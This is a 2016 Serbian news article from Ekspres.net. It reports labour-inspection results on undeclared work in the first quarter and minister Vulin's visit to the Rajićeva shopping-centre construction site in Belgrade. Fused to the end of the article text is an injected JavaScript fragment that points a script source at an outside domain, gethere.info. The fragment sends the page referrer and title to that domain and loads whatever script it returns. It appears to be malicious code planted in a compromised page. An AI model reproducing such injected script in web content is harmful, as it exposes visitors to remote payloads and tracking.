Vesti
19.04.2016. 11:11
ekspres

Zbog rada na crno poslodavci platili više od 60 miliona

Ekspres.net
Izvor: Ekspres.net

BEOGRAD, 19. aprila  - U prvom kvartalu ove godine inspektori rada zatekli su 4.793 radnika na crno od kojih je, posle preduzetih mera inspektora, s poslodavcem 3.728 zasnovalo radni odnos, odnosno oko 80 odsto. Kako je, prilikom obilaska gradilišta Šoping centra Rajićeva u Beogradu izjavio ministar za rad, zapošljavanje, boračka i socijalna pitanja Aleksandar Vulin, poslodavci su kažnjeni novčanim kaznama u ukupnom iznosu od 62 miliona dinara, a na osnovu izdatih prekršajnih naloga u republički budžet uplaćeno je oko 7,5 miliona dinara. “Prošle godine na osnovu rešenja inspektora rada, za celu godinu zaposleno je 12.251 jedna osoba koja je otkrivena da radi na crno. Sigurni smo da će ova godina biti još bolja, iako je prema rezultatima prošla bila najbolja u istoriji inspekcije rada”, rekao je Vulin.

Ekspres.net
Izvor: Ekspres.netEkspres.net

On je dodao da je inspekcija od 1. januara do 31. marta otkrila 222 neregistrovana privredna subjekta, od kojih je 117 odmah registrovano, 98 prekinulo rad i pokrenulo postupak upisa u registar, a sedam izjavilo da ne želi da se registruje i prekinulo dalji rad.
“Jedan od naših prioriteta biće nastavak borbe protiv rada na crno, ali ne i manji prioritet biće da pojačano vodimo računa o bezbednosti , zaštiti i zdravlju naših radnika”, rekao je Vulin.
Kada je reč o bezbednosti na radu, Vulin je zahvalio predstavnicima kompanije “Asthrom international”, koja izvodi radove na Šoping centru Rajićeva, jer su, kako je istakao, izvanredan primer kako bi investitor i svi zajedno trebalo da se ponašamo prema radnicima.
“To je preduzeće u kojem se vodi računa o bezbednosti i zaštiti na radu, u kojem je radnik prijavljen, zaštićen i u kojem zna koje su njegove obaveze i kako se vodi računa o njegovim pravima. To je primer dobre prakse i želeli bismo da svim poslodavcima ukažemo na takve primere i da se svi potrudimo da više ličimo na naše prijatelje iz ''Ashtrom internationala''”, rekao je Vulin.
Ekspres.net
Izvor: Ekspres.netEkspres.net

Ministar je dodao da se veličina projekta na kojem radi izraelska kompanija ne meri samo novcem, već i odnosom prema ljudima koji tu rade.“Za mene kao ministra rada uvek su dve stvari od presudne važnosti - bezbednost i zaštita radnika, ali i poštovanje zakonskih regulativa i propisa”, istakao je Vulin.Direktor kompanije ABD d.o.o. Cahi Boneh, prilikom obilaska radova sa ministrom Vulinom i inspektorima rada, rekao je da radovi brzo napreduju i da bi šoping centar trebalo da bude otvoren, kako je i planirano, u septembru 2017.“Trenutno je na radovima angažovano između 150 i 200 radnika, ali njihov broj će se značajno povećati kada budemo ušli u fazu završnih radova”, rekao je Boneh.Prema njegovim rečima bezbednost radnika je jedan od najznačajnijih prioriteta izraelske kompanije koja, kako je naglasio, kontinuirano nastoji da primeni sve preventivne mere kako bi obezbedila bezbednost i zdravlje radnika na projektu.
“Veoma smo ponosni i zadovolljni jer su nadležne instuticije prepoznale naše napore i projekat u Rajićevoj izdvojili kao primer dobre prakse u oblasti bezbednosti i zdravlja na radu”, rekao je Boneh.Šoping centar Rajićeva i budući hotel, koji se nalaze na uglu Knez Mihailove ulice, Rajićeve i Vasine, predstavlja izraelsku investiciju vrednu oko 80 miliona evra i imaće površinu od oko 58.000 kvadratnih metara.Kako je planirano, ispod hotela i tržnog centra nalaziće se podzemni parking na tri nivoa sa oko 500 javnih parking mesta.Šoping centar imaće šest spratova za iznajmljivanje sa više od 80 lokala, koji bi trebalo da zaposle oko 400 radnika, dok bi posle otvaranja hotela tu moglo da se otvori još oko 400 radnih mesta.s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Komentari
Dodaj komentar
Close
Vremenska prognoza
clear sky
6°C
19.04.2024.
Beograd
Wind
PM2.5
5µg/m3
PM10
6µg/m3
UV
UV indeks
1
AQI indeks
1

Oni su ponos Srbije

Vidi sve

Najnovije

Vidi sve

Iz drugačijeg ugla

Vidi sve